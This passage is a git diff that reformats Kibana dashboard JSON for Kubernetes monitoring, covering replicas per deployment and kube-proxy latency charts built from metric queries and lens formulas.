"0bcf546f-2a52-48e7-8c4e-3a908be9d6c4", - "9b5ed643-7572-4d3b-a9af-6265b3a5a515" - ], - "layerId": "2ef0145f-ac0f-4dd6-9db2-6ea531a0bc31", - "layerType": "data", - "seriesType": "bar_stacked", - "xAccessor": "28ea2553-630d-4917-b778-52da2d5bba86", - "yConfig": [ - { - "color": "#f00e0e", - "forAccessor": "0bcf546f-2a52-48e7-8c4e-3a908be9d6c4" - }, - { - "color": "#6092c0", - "forAccessor": "9b5ed643-7572-4d3b-a9af-6265b3a5a515" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right" - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } + "size": 20 + }, + "scale": "ordinal", + "sourceField": "kubernetes.deployment.name" + }, + "77f5c6a8-9fb9-4bdd-bf9e-80fc5bd19625": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.deployment.replicas.available: *" + }, + "isBucketed": false, + "label": "Replicas Available", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.deployment.replicas.available" }, - "title": "Replicas per Deployment [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsXY" + "9b5ed643-7572-4d3b-a9af-6265b3a5a515": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Replicas Desired", + "operationType": "median", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "kubernetes.deployment.replicas.desired" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "ce8436e0-8192-447a-b427-103026d8aa4b", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_deployment" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + 
"data_stream.dataset": "kubernetes.state_deployment" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 17, - "i": "119cd3f7-baa7-4a1d-8e02-a4ae95c98d1f", - "w": 48, - "x": 0, - "y": 11 + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "119cd3f7-baa7-4a1d-8e02-a4ae95c98d1f", - "title": "Replicas per Deployment [Metrics Kubernetes]", - "type": "lens", - "version": "8.10.2" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] Deployments", - "version": 1 - }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-31T12:44:00.635Z", - "id": "kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013", - "managed": false, - "references": [ - { - "id": "metrics-*", - "name": "c2551403-dc87-4486-bcac-0b949508082e:indexpattern-datasource-layer-f89abbc1-82fb-4d41-a11a-cf433264e823", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "c2551403-dc87-4486-bcac-0b949508082e:611773bb-5ff9-4f08-ad80-de730b3bb8da", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "51e54a67-b167-49a2-95e6-e758a953a7e8:indexpattern-datasource-layer-0f3d63e6-e7d7-45d7-acc1-13be66847b70", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "51e54a67-b167-49a2-95e6-e758a953a7e8:899d30db-ab00-4a6f-9323-d4232f23735e", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "934fbda9-c201-4539-bb6d-95c416b9d392:indexpattern-datasource-layer-0a77b34d-ac0b-448e-9d8e-af8dbe4cebd6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "934fbda9-c201-4539-bb6d-95c416b9d392:78f09db9-67c3-40f1-93c7-9ba2b8ca8299", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "20bd8473-2d2a-4d6c-84f7-20dbd9e724c6:indexpattern-datasource-layer-006a132f-0e92-4aa2-818e-bc6aef899777", 
- "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "20bd8473-2d2a-4d6c-84f7-20dbd9e724c6:ae122104-dfc0-48a6-b40c-94109bc57cbf", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "119cd3f7-baa7-4a1d-8e02-a4ae95c98d1f:indexpattern-datasource-layer-2ef0145f-ac0f-4dd6-9db2-6ea531a0bc31", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "119cd3f7-baa7-4a1d-8e02-a4ae95c98d1f:ce8436e0-8192-447a-b427-103026d8aa4b", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_01b10632-f741-4099-981d-f1008020884b:optionsListDataView", - "type": "index-pattern" + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "77f5c6a8-9fb9-4bdd-bf9e-80fc5bd19625", + "0bcf546f-2a52-48e7-8c4e-3a908be9d6c4", + "9b5ed643-7572-4d3b-a9af-6265b3a5a515" + ], + "layerId": "2ef0145f-ac0f-4dd6-9db2-6ea531a0bc31", + "layerType": "data", + "seriesType": "bar_stacked", + "xAccessor": "28ea2553-630d-4917-b778-52da2d5bba86", + "yConfig": [ + { + "color": "#f00e0e", + "forAccessor": "0bcf546f-2a52-48e7-8c4e-3a908be9d6c4" + }, + { + "color": "#6092c0", + "forAccessor": "9b5ed643-7572-4d3b-a9af-6265b3a5a515" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "Replicas per Deployment [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false }, - { - "id": "metrics-*", - "name": "controlGroup_e2a1ee45-5917-4945-a7fd-f4ee281b8d6d:optionsListDataView", - "type": "index-pattern" + "gridData": { + "h": 17, + "i": "119cd3f7-baa7-4a1d-8e02-a4ae95c98d1f", + "w": 48, + "x": 0, + "y": 11 }, - { - "id": "metrics-*", - "name": "controlGroup_9e437628-d460-4697-9427-616333ef6947:optionsListDataView", - "type": "index-pattern" - } + 
"panelIndex": "119cd3f7-baa7-4a1d-8e02-a4ae95c98d1f", + "title": "Replicas per Deployment [Metrics Kubernetes]", + "type": "lens", + "version": "8.10.2" + } ], - "type": "dashboard", - "typeMigrationVersion": "8.9.0" + "timeRestore": false, + "title": "[Metrics Kubernetes] Deployments", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "c2551403-dc87-4486-bcac-0b949508082e:indexpattern-datasource-layer-f89abbc1-82fb-4d41-a11a-cf433264e823", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c2551403-dc87-4486-bcac-0b949508082e:611773bb-5ff9-4f08-ad80-de730b3bb8da", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "51e54a67-b167-49a2-95e6-e758a953a7e8:indexpattern-datasource-layer-0f3d63e6-e7d7-45d7-acc1-13be66847b70", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "51e54a67-b167-49a2-95e6-e758a953a7e8:899d30db-ab00-4a6f-9323-d4232f23735e", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "934fbda9-c201-4539-bb6d-95c416b9d392:indexpattern-datasource-layer-0a77b34d-ac0b-448e-9d8e-af8dbe4cebd6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "934fbda9-c201-4539-bb6d-95c416b9d392:78f09db9-67c3-40f1-93c7-9ba2b8ca8299", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "20bd8473-2d2a-4d6c-84f7-20dbd9e724c6:indexpattern-datasource-layer-006a132f-0e92-4aa2-818e-bc6aef899777", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "20bd8473-2d2a-4d6c-84f7-20dbd9e724c6:ae122104-dfc0-48a6-b40c-94109bc57cbf", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "119cd3f7-baa7-4a1d-8e02-a4ae95c98d1f:indexpattern-datasource-layer-2ef0145f-ac0f-4dd6-9db2-6ea531a0bc31", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "119cd3f7-baa7-4a1d-8e02-a4ae95c98d1f:ce8436e0-8192-447a-b427-103026d8aa4b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 
"controlGroup_01b10632-f741-4099-981d-f1008020884b:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_e2a1ee45-5917-4945-a7fd-f4ee281b8d6d:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_9e437628-d460-4697-9427-616333ef6947:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-5e649d60-9901-11e9-ba57-b7ab4e2d4b58.json b/packages/kubernetes/kibana/dashboard/kubernetes-5e649d60-9901-11e9-ba57-b7ab4e2d4b58.json index 369476df582..27e10234f6d 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-5e649d60-9901-11e9-ba57-b7ab4e2d4b58.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-5e649d60-9901-11e9-ba57-b7ab4e2d4b58.json 
@@ -1,2514 +1,2533 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "oneLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"f53d0d21-4502-4dce-8004-017a92104040\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"host.name\",\"title\":\"Host\",\"id\":\"f53d0d21-4502-4dce-8004-017a92104040\",\"selectedOptions\":[],\"enhancements\":{},\"singleSelect\":false}},\"df56c430-83b1-436e-8b9c-fb027aaa29ca\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster\",\"singleSelect\":true,\"id\":\"df56c430-83b1-436e-8b9c-fb027aaa29ca\",\"selectedOptions\":[],\"enhancements\":{}}}}" + "id": "kubernetes-5e649d60-9901-11e9-ba57-b7ab4e2d4b58", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI0OCwyXQ==", + "attributes": { + "controlGroupInput": { + "controlStyle": "oneLine", + "chainingSystem": "HIERARCHICAL", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": 
"{\"f53d0d21-4502-4dce-8004-017a92104040\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"host.name\",\"title\":\"Host\",\"id\":\"f53d0d21-4502-4dce-8004-017a92104040\",\"selectedOptions\":[],\"enhancements\":{},\"singleSelect\":false}},\"df56c430-83b1-436e-8b9c-fb027aaa29ca\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster\",\"singleSelect\":true,\"id\":\"df56c430-83b1-436e-8b9c-fb027aaa29ca\",\"selectedOptions\":[],\"enhancements\":{}}}}" + }, + "description": "Kubernetes Proxy metrics", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.proxy" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.proxy" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": true, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 4, + "i": "c13eb504-6afb-4fa5-8a7d-a75c5fee15b7", + "w": 48, + "x": 0, + "y": 0 }, - "description": "Kubernetes Proxy metrics", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ + "panelIndex": "c13eb504-6afb-4fa5-8a7d-a75c5fee15b7", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "### 
Proxy\n\nThis dashboard collects data from [kube proxy](https://kubernetes.io/docs/concepts/overview/components/#kube-proxy) endpoint. Its purpose is to give an overview of what is happening inside it and detect problems that might be happening.", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" + } + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 3, + "i": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd", + "w": 48, + "x": 0, + "y": 4 + }, + "panelIndex": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "params": { + "axis_formatter": "number", + "axis_position": "left", + "axis_scale": "normal", + "background_color": "rgba(203,228,249,1)", + "drop_last_bucket": 0, + "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", + "index_pattern_ref_name": "metrics_ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd_0_index_pattern", + "interval": "", + "isModelInvalid": false, + "markdown": "Rules", + "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", + "markdown_vertical_align": "middle", + "max_lines_legend": 1, + "series": [ + { + "axis_position": "right", + "chart_type": "line", + "color": "#68BC00", + "fill": 0.5, + "formatter": "default", + "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", + "line_width": 1, + "metrics": [ { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": 
"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.proxy" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.proxy" - } - } + "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", + "type": "count" } - ], - "query": { - "language": "kuery", - "query": "" + ], + "override_index_pattern": 0, + "palette": { + "name": "default", + "type": "palette" + }, + "point_size": 1, + "separate_axis": 0, + "series_drop_last_bucket": 0, + "split_mode": "everything", + "stacked": "none", + "time_range_mode": "entire_time_range" } - } + ], + "show_grid": 1, + "show_legend": 1, + "time_field": "", + "time_range_mode": "entire_time_range", + "tooltip_mode": "show_all", + "truncate_legend": 1, + "type": "markdown", + "use_kibana_indexes": true + }, + "title": "", + "type": "metrics", + "uiState": {} + }, + "type": "visualization" }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": true, - "syncCursor": true, - "syncTooltips": false, - "useMargins": true + "title": "Proxy" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "f74e1a86-4370-4f65-a3b8-d92c9f25ff42", + "w": 24, + "x": 0, + "y": 7 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "panelIndex": "f74e1a86-4370-4f65-a3b8-d92c9f25ff42", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-5de1942f-e0a5-4ed8-86c0-972d57d62085", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "5de1942f-e0a5-4ed8-86c0-972d57d62085": { + "columnOrder": [ + "f80bbb4a-6177-4118-9483-7f58928032d4", + 
"8cb92e23-1df9-41ca-8061-ad76616f76c7", + "a436f8a7-433c-4b20-b115-717f4da445cb", + "a436f8a7-433c-4b20-b115-717f4da445cbX2", + "a436f8a7-433c-4b20-b115-717f4da445cbX1", + "a436f8a7-433c-4b20-b115-717f4da445cbX0" + ], + "columns": { + "8cb92e23-1df9-41ca-8061-ad76616f76c7": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" }, - "description": "", - "id": "", - "params": { - "fontSize": 12, - "markdown": "### Proxy\n\nThis dashboard collects data from [kube proxy](https://kubernetes.io/docs/concepts/overview/components/#kube-proxy) endpoint. Its purpose is to give an overview of what is happening inside it and detect problems that might be happening.", - "openLinksInNewTab": false + "a436f8a7-433c-4b20-b115-717f4da445cb": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Latency", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 2, + "suffix": "s" + } + }, + "formula": "last_value(kubernetes.proxy.sync.networkprogramming.duration.us.sum)/(pick_max(last_value(kubernetes.proxy.sync.networkprogramming.duration.us.count),1))/1000000", + "isFormulaBroken": false + }, + "references": [ + "a436f8a7-433c-4b20-b115-717f4da445cbX2" + ], + "scale": "ratio" }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 4, - "i": "c13eb504-6afb-4fa5-8a7d-a75c5fee15b7", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "c13eb504-6afb-4fa5-8a7d-a75c5fee15b7", - "type": "visualization", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "a436f8a7-433c-4b20-b115-717f4da445cbX0": { + 
"customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.proxy.sync.networkprogramming.duration.us.sum: *" + }, + "isBucketed": false, + "label": "Part of Latency", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.sync.networkprogramming.duration.us.sum" }, - "description": "", - "params": { - "axis_formatter": "number", - "axis_position": "left", - "axis_scale": "normal", - "background_color": "rgba(203,228,249,1)", - "drop_last_bucket": 0, - "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", - "index_pattern_ref_name": "metrics_ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd_0_index_pattern", - "interval": "", - "isModelInvalid": false, - "markdown": "Rules", - "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", - "markdown_vertical_align": "middle", - "max_lines_legend": 1, - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "#68BC00", - "fill": 0.5, - "formatter": "default", - "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", - "line_width": 1, - "metrics": [ - { - "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", - "type": "count" - } - ], - "override_index_pattern": 0, - "palette": { - "name": "default", - "type": "palette" - }, - "point_size": 1, - "separate_axis": 0, - "series_drop_last_bucket": 0, - "split_mode": "everything", - "stacked": "none", - "time_range_mode": "entire_time_range" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "", - "time_range_mode": "entire_time_range", - "tooltip_mode": "show_all", - "truncate_legend": 1, - "type": "markdown", - 
"use_kibana_indexes": true + "a436f8a7-433c-4b20-b115-717f4da445cbX1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.proxy.sync.networkprogramming.duration.us.count: *" + }, + "isBucketed": false, + "label": "Part of Latency", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.sync.networkprogramming.duration.us.count" }, - "title": "", - "type": "metrics", - "uiState": {} - } - }, - "gridData": { - "h": 3, - "i": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd", - "w": 48, - "x": 0, - "y": 4 - }, - "panelIndex": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd", - "title": "Proxy", - "type": "visualization", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-5de1942f-e0a5-4ed8-86c0-972d57d62085", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "5de1942f-e0a5-4ed8-86c0-972d57d62085": { - "columnOrder": [ - "f80bbb4a-6177-4118-9483-7f58928032d4", - "8cb92e23-1df9-41ca-8061-ad76616f76c7", - "a436f8a7-433c-4b20-b115-717f4da445cb", - "a436f8a7-433c-4b20-b115-717f4da445cbX2", - "a436f8a7-433c-4b20-b115-717f4da445cbX1", - "a436f8a7-433c-4b20-b115-717f4da445cbX0" - ], - "columns": { - "8cb92e23-1df9-41ca-8061-ad76616f76c7": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "a436f8a7-433c-4b20-b115-717f4da445cb": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Latency", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 2, - "suffix": "s" - } - }, - "formula": 
"last_value(kubernetes.proxy.sync.networkprogramming.duration.us.sum)/(pick_max(last_value(kubernetes.proxy.sync.networkprogramming.duration.us.count),1))/1000000", - "isFormulaBroken": false - }, - "references": [ - "a436f8a7-433c-4b20-b115-717f4da445cbX2" - ], - "scale": "ratio" - }, - "a436f8a7-433c-4b20-b115-717f4da445cbX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.proxy.sync.networkprogramming.duration.us.sum: *" - }, - "isBucketed": false, - "label": "Part of Latency", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.sync.networkprogramming.duration.us.sum" - }, - "a436f8a7-433c-4b20-b115-717f4da445cbX1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.proxy.sync.networkprogramming.duration.us.count: *" - }, - "isBucketed": false, - "label": "Part of Latency", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.sync.networkprogramming.duration.us.count" - }, - "a436f8a7-433c-4b20-b115-717f4da445cbX2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Latency", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - { - "args": [ - "a436f8a7-433c-4b20-b115-717f4da445cbX0", - { - "args": [ - "a436f8a7-433c-4b20-b115-717f4da445cbX1", - 1 - ], - "location": { - "max": 152, - "min": 70 - }, - "name": "pick_max", - "text": "pick_max(last_value(kubernetes.proxy.sync.networkprogramming.duration.us.count),1)", - "type": "function" - } - ], - "name": "divide", - "type": "function" - }, - 1000000 - ], - "location": { - "max": 161, - "min": 0 - }, - "name": "divide", - "text": 
"last_value(kubernetes.proxy.sync.networkprogramming.duration.us.sum)/(pick_max(last_value(kubernetes.proxy.sync.networkprogramming.duration.us.count),1))/1000000", - "type": "function" - } - }, - "references": [ - "a436f8a7-433c-4b20-b115-717f4da445cbX0", - "a436f8a7-433c-4b20-b115-717f4da445cbX1" - ], - "scale": "ratio" - }, - "f80bbb4a-6177-4118-9483-7f58928032d4": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of host.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "host.name" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ + "a436f8a7-433c-4b20-b115-717f4da445cbX2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Latency", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + { + "args": [ + "a436f8a7-433c-4b20-b115-717f4da445cbX0", { - "accessors": [ - "a436f8a7-433c-4b20-b115-717f4da445cb" - ], - "layerId": "5de1942f-e0a5-4ed8-86c0-972d57d62085", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "f80bbb4a-6177-4118-9483-7f58928032d4", - "xAccessor": "8cb92e23-1df9-41ca-8061-ad76616f76c7" + "args": [ + "a436f8a7-433c-4b20-b115-717f4da445cbX1", + 1 + ], + "location": { + "max": 152, + "min": 70 + }, + "name": "pick_max", + "text": "pick_max(last_value(kubernetes.proxy.sync.networkprogramming.duration.us.count),1)", + "type": "function" } - ], - "legend": { - "isVisible": true, - 
"legendSize": "large", - "position": "right", - "shouldTruncate": false + ], + "name": "divide", + "type": "function" }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" + 1000000 + ], + "location": { + "max": 161, + "min": 0 + }, + "name": "divide", + "text": "last_value(kubernetes.proxy.sync.networkprogramming.duration.us.sum)/(pick_max(last_value(kubernetes.proxy.sync.networkprogramming.duration.us.count),1))/1000000", + "type": "function" } + }, + "references": [ + "a436f8a7-433c-4b20-b115-717f4da445cbX0", + "a436f8a7-433c-4b20-b115-717f4da445cbX1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 14, - "i": "f74e1a86-4370-4f65-a3b8-d92c9f25ff42", - "w": 24, - "x": 0, - "y": 7 - }, - "panelIndex": "f74e1a86-4370-4f65-a3b8-d92c9f25ff42", - "title": "Average network programming latency", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-0b5eadf5-2a9c-49a2-b862-d317822adfd8", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "0b5eadf5-2a9c-49a2-b862-d317822adfd8": { - "columnOrder": [ - "9ce45236-05a8-478a-a1e1-85ccd013786c", - "c159c217-ff39-456c-ae61-593bb727a2df", - "9203a269-fdcb-4598-859d-d73f8c9734e0", - "9203a269-fdcb-4598-859d-d73f8c9734e0X0", - "9203a269-fdcb-4598-859d-d73f8c9734e0X2", - "9203a269-fdcb-4598-859d-d73f8c9734e0X1" - ], - "columns": { - "9203a269-fdcb-4598-859d-d73f8c9734e0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Average latency", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 2, - "suffix": "s" - } - }, - "formula": 
"last_value(kubernetes.proxy.sync.rules.duration.us.sum, kql='kubernetes.proxy.sync.rules.duration.us.sum: *')/last_value(kubernetes.proxy.sync.rules.duration.us.count, kql='kubernetes.proxy.sync.rules.duration.us.count: *')/1000000", - "isFormulaBroken": false - }, - "references": [ - "9203a269-fdcb-4598-859d-d73f8c9734e0X2" - ], - "scale": "ratio" - }, - "9203a269-fdcb-4598-859d-d73f8c9734e0X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.proxy.sync.rules.duration.us.sum: *" - }, - "isBucketed": false, - "label": "Part of last_value(kubernetes.proxy.sync.rules.duration.us.sum, kql='kubernetes.proxy.sync.rules.duration.us.sum: *')/last_value(kubernetes.proxy.sync.rules.duration.us.count, kql='kubernetes.proxy.sync.rules.duration.us.count: *')/1000000", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.sync.rules.duration.us.sum" - }, - "9203a269-fdcb-4598-859d-d73f8c9734e0X1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": 